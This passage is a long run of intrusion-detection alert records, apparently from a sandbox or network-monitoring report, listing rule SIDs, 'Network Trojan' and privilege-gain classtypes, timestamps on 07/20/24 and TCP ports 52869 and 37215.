                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:45.202570
                      SID:2831300
                      Source Port:53546
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:52.877228
                      SID:2027339
                      Source Port:56862
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.114673
                      SID:2835222
                      Source Port:53382
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.143923
                      SID:2027339
                      Source Port:43004
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.082385
                      SID:2829579
                      Source Port:37702
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.454682
                      SID:2025132
                      Source Port:36628
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:46.783122
                      SID:2831300
                      Source Port:38728
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:31.320679
                      SID:2027339
                      Source Port:47936
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.565131
                      SID:2831300
                      Source Port:39708
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:31.314906
                      SID:2831300
                      Source Port:52102
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:31.312894
                      SID:2831300
                      Source Port:53344
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:54.693625
                      SID:2831300
                      Source Port:60830
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:25.544921
                      SID:2025132
                      Source Port:46024
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:42.662466
                      SID:2027339
                      Source Port:34206
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:49.809920
                      SID:2027339
                      Source Port:60818
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:34.046616
                      SID:2829579
                      Source Port:53134
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.132906
                      SID:2025132
                      Source Port:41954
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:53.175676
                      SID:2025132
                      Source Port:42312
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:41.549052
                      SID:2027339
                      Source Port:58950
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.157619
                      SID:2835222
                      Source Port:41878
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:08.826483
                      SID:2025132
                      Source Port:38298
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:42.290838
                      SID:2027339
                      Source Port:37510
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.339597
                      SID:2027339
                      Source Port:48770
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.156801
                      SID:2027339
                      Source Port:33870
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:57.269160
                      SID:2025132
                      Source Port:34702
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:31.975158
                      SID:2835222
                      Source Port:58822
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.885895
                      SID:2835222
                      Source Port:47550
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:11.630112
                      SID:2025132
                      Source Port:50674
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:40.334452
                      SID:2835222
                      Source Port:35542
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.664090
                      SID:2831300
                      Source Port:58386
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:58.313085
                      SID:2025132
                      Source Port:51858
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:02:18.238800
                      SID:2025132
                      Source Port:35348
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:40.336908
                      SID:2835222
                      Source Port:52330
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.634900
                      SID:2831300
                      Source Port:55072
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:14.097795
                      SID:2835222
                      Source Port:36418
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.439689
                      SID:2831300
                      Source Port:48834
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:54.914948
                      SID:2831300
                      Source Port:54606
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:21.923917
                      SID:2835222
                      Source Port:46286
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:48.065745
                      SID:2027339
                      Source Port:48512
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:21.923917
                      SID:2829579
                      Source Port:54698
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:27.654172
                      SID:2829579
                      Source Port:48970
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.991336
                      SID:2829579
                      Source Port:58400
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:10.675827
                      SID:2027339
                      Source Port:40854
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.808098
                      SID:2027339
                      Source Port:34120
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:40.301143
                      SID:2835222
                      Source Port:55040
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.542563
                      SID:2027339
                      Source Port:60338
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:27.730585
                      SID:2829579
                      Source Port:54896
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:14.103467
                      SID:2835222
                      Source Port:42824
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.496780
                      SID:2027339
                      Source Port:49224
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:00.634089
                      SID:2829579
                      Source Port:48680
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.520663
                      SID:2027339
                      Source Port:50418
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.663629
                      SID:2025132
                      Source Port:52128
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:41.182584
                      SID:2025132
                      Source Port:41186
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:45.683188
                      SID:2027339
                      Source Port:37380
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.891992
                      SID:2025132
                      Source Port:56782
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:52.019773
                      SID:2025132
                      Source Port:47734
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:08.606848
                      SID:2027339
                      Source Port:47194
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:14.097135
                      SID:2835222
                      Source Port:50178
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:49.207937
                      SID:2025132
                      Source Port:40814
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:00.634089
                      SID:2835222
                      Source Port:38216
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:05.036436
                      SID:2027339
                      Source Port:49572
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.079114
                      SID:2835222
                      Source Port:43806
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.236294
                      SID:2027339
                      Source Port:41822
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:52.089079
                      SID:2027339
                      Source Port:59652
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.076704
                      SID:2027339
                      Source Port:44404
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.312311
                      SID:2027339
                      Source Port:49010
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:21.928521
                      SID:2829579
                      Source Port:46762
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.474540
                      SID:2025132
                      Source Port:44732
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:41.383466
                      SID:2025132
                      Source Port:35130
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:57.049485
                      SID:2027339
                      Source Port:39522
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:02.537098
                      SID:2025132
                      Source Port:54690
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:42.727671
                      SID:2025132
                      Source Port:41428
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:14.207040
                      SID:2835222
                      Source Port:53312
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:11.636599
                      SID:2829579
                      Source Port:47636
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.148866
                      SID:2831300
                      Source Port:41282
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:12.807101
                      SID:2027339
                      Source Port:37332
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:00.647694
                      SID:2835222
                      Source Port:59862
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.700808
                      SID:2027339
                      Source Port:36296
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:52.934726
                      SID:2025132
                      Source Port:39634
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:24.589249
                      SID:2025132
                      Source Port:44726
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:42.304767
                      SID:2027339
                      Source Port:34786
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:01.645031
                      SID:2027339
                      Source Port:39976
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.313122
                      SID:2831300
                      Source Port:35230
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:53.625100
                      SID:2027339
                      Source Port:37504
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.977603
                      SID:2829579
                      Source Port:58014
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.979565
                      SID:2829579
                      Source Port:40992
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.156801
                      SID:2027339
                      Source Port:44846
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:09.321968
                      SID:2027339
                      Source Port:55380
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.766644
                      SID:2025132
                      Source Port:57512
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:06.975117
                      SID:2835222
                      Source Port:32942
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.626717
                      SID:2831300
                      Source Port:59244
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:51.275864
                      SID:2027339
                      Source Port:42096
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:00.635367
                      SID:2829579
                      Source Port:44792
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.280820
                      SID:2831300
                      Source Port:52686
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:49.775041
                      SID:2025132
                      Source Port:36792
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:31.991336
                      SID:2829579
                      Source Port:41200
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.270636
                      SID:2831300
                      Source Port:55774
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:31.317668
                      SID:2027339
                      Source Port:48316
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.758824
                      SID:2027339
                      Source Port:35010
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:01.799480
                      SID:2025132
                      Source Port:60470
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:50.093097
                      SID:2027339
                      Source Port:40554
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.944299
                      SID:2829579
                      Source Port:46626
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:03.120339
                      SID:2027339
                      Source Port:59050
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.360712
                      SID:2025132
                      Source Port:55964
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:42.430595
                      SID:2025132
                      Source Port:52592
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:54.345402
                      SID:2025132
                      Source Port:48096
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:43.078618
                      SID:2027339
                      Source Port:51042
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:48.901809
                      SID:2027339
                      Source Port:34252
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:03.149410
                      SID:2025132
                      Source Port:34424
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:02:07.552669
                      SID:2027339
                      Source Port:54260
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.425298
                      SID:2025132
                      Source Port:48686
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:11.639230
                      SID:2829579
                      Source Port:42332
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.458332
                      SID:2027339
                      Source Port:35490
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:27.658221
                      SID:2835222
                      Source Port:34896
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.934977
                      SID:2835222
                      Source Port:50816
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:58.055688
                      SID:2027339
                      Source Port:33598
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:51.107223
                      SID:2025132
                      Source Port:56572
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:24.885895
                      SID:2835222
                      Source Port:49634
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.729311
                      SID:2027339
                      Source Port:49758
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:10.996987
                      SID:2025132
                      Source Port:39666
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:41.478929
                      SID:2027339
                      Source Port:48268
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.933370
                      SID:2829579
                      Source Port:52192
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:48.433265
                      SID:2027339
                      Source Port:55244
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.877747
                      SID:2829579
                      Source Port:55018
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:21.915268
                      SID:2829579
                      Source Port:42074
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.303669
                      SID:2025132
                      Source Port:49992
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:27.654172
                      SID:2835222
                      Source Port:37200
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.000471
                      SID:2027339
                      Source Port:56196
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:57.221280
                      SID:2829579
                      Source Port:43126
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:53.560520
                      SID:2027339
                      Source Port:49688
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:27.650969
                      SID:2835222
                      Source Port:54752
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.096837
                      SID:2027339
                      Source Port:39946
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:54.880741
                      SID:2027339
                      Source Port:52238
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:06.973541
                      SID:2835222
                      Source Port:49004
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.321188
                      SID:2831300
                      Source Port:57476
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:42.557694
                      SID:2831300
                      Source Port:53706
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:42.147980
                      SID:2831300
                      Source Port:56000
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:00:59.211046
                      SID:2835222
                      Source Port:46326
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:50.188348
                      SID:2025132
                      Source Port:51040
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:42.778817
                      SID:2831300
                      Source Port:40746
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:02:03.159117
                      SID:2831300
                      Source Port:38730
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:07.033766
                      SID:2835222
                      Source Port:60624
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.047411
                      SID:2835222
                      Source Port:45312
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:05.786490
                      SID:2831300
                      Source Port:44472
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:02:12.682460
                      SID:2025132
                      Source Port:58340
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:02:14.650164
                      SID:2027339
                      Source Port:35728
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:40.286738
                      SID:2835222
                      Source Port:56342
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.574617
                      SID:2831300
                      Source Port:39656
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:20.131339
                      SID:2829579
                      Source Port:45952
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.263056
                      SID:2025132
                      Source Port:38236
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:00:59.192052
                      SID:2835222
                      Source Port:44056
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.453936
                      SID:2027339
                      Source Port:34994
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:34.062277
                      SID:2835222
                      Source Port:53428
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.104572
                      SID:2829579
                      Source Port:46440
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:34.048825
                      SID:2835222
                      Source Port:41408
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.209467
                      SID:2027339
                      Source Port:43906
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:59.292118
                      SID:2027339
                      Source Port:58552
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:59.196993
                      SID:2829579
                      Source Port:46650
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.965900
                      SID:2025132
                      Source Port:44986
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:59.188717
                      SID:2027339
                      Source Port:50172
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:03.153933
                      SID:2025132
                      Source Port:34664
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:04.155095
                      SID:2025132
                      Source Port:50178
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:42.745651
                      SID:2025132
                      Source Port:36060
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:03.482119
                      SID:2027339
                      Source Port:35784
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.615260
                      SID:2831300
                      Source Port:36786
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:45.547334
                      SID:2831300
                      Source Port:59954
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:47.062116
                      SID:2027339
                      Source Port:33920
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:57.220899
                      SID:2829579
                      Source Port:40788
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.578727
                      SID:2831300
                      Source Port:48380
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:42.262355
                      SID:2027339
                      Source Port:34778
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.211007
                      SID:2027339
                      Source Port:46490
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:57.221504
                      SID:2835222
                      Source Port:52232
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:01.810641
                      SID:2027339
                      Source Port:59764
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:07.005156
                      SID:2835222
                      Source Port:57052
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.906354
                      SID:2831300
                      Source Port:43652
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:52.686542
                      SID:2027339
                      Source Port:35262
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:55.481754
                      SID:2027339
                      Source Port:57092
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:27.653586
                      SID:2829579
                      Source Port:33690
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:34.044717
                      SID:2835222
                      Source Port:58342
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.677814
                      SID:2027339
                      Source Port:44632
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
